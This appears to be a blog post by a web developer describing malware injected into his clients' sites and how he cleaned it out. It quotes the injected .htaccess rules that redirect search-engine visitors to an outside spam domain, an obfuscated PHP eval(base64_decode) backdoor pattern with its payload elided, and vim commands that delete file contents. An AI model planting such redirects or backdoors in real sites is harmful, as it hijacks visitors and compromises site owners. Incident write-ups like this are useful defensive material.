PHP/.htaccess Hacks

Today, I got an email from not a client, but a user of a client’s site telling me something was wrong.

Hearing that isn’t good.

So I combed through the code to see what it could be and found the problem. It seemed the following code was being placed into the .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4¶meter=sf [R,L]

….and this code within index.php files:


< ?php eval(base64_decode("JGw9**bla bla bla bla**")); ?>

That was nasty. Fortunately, it only broke that one site I was contacted about. At first, I thought it wa that my FTP account was hacked or something. However, I found that someone else was having this problem too, and at the same time (or at least 10 or so hours earlier). His post was helpful in helping me not blame myself and see what the situation was as a whole.

After I finished fixing the one site and reading that blog post, I started combing through the other directories. Here’s what I noticed:

  • in each directory, I noticed that the index.php and .htaccess were infected with this code. To check and see if other files had problems as well, I listed all the files in my FTP program by it’s modified date, as shown below:
    Checking to see which files have been affected.
  • Only sites in my /domains directory that were affected had either Horde, WordPress, Drupal, or Modx installed. Even installations that did not have a public URL.
  • I used the following search and replace commands in vim to help out:
    For index.php:

    %s/eval(base64_decode("JGw9**bla-bla-bla-bla**"));//g

    For .htaccess:

    .,$s/.*//g

    Warning: This deletes everything after the line it is run on! I could not find a suitable way to include the malicious code into search and replace (it was late), but this helped by going to the top of where the malicious code starts, and running it that way.

That’s enough for now. Some kids my age go out and party. I just fix security issues that arise.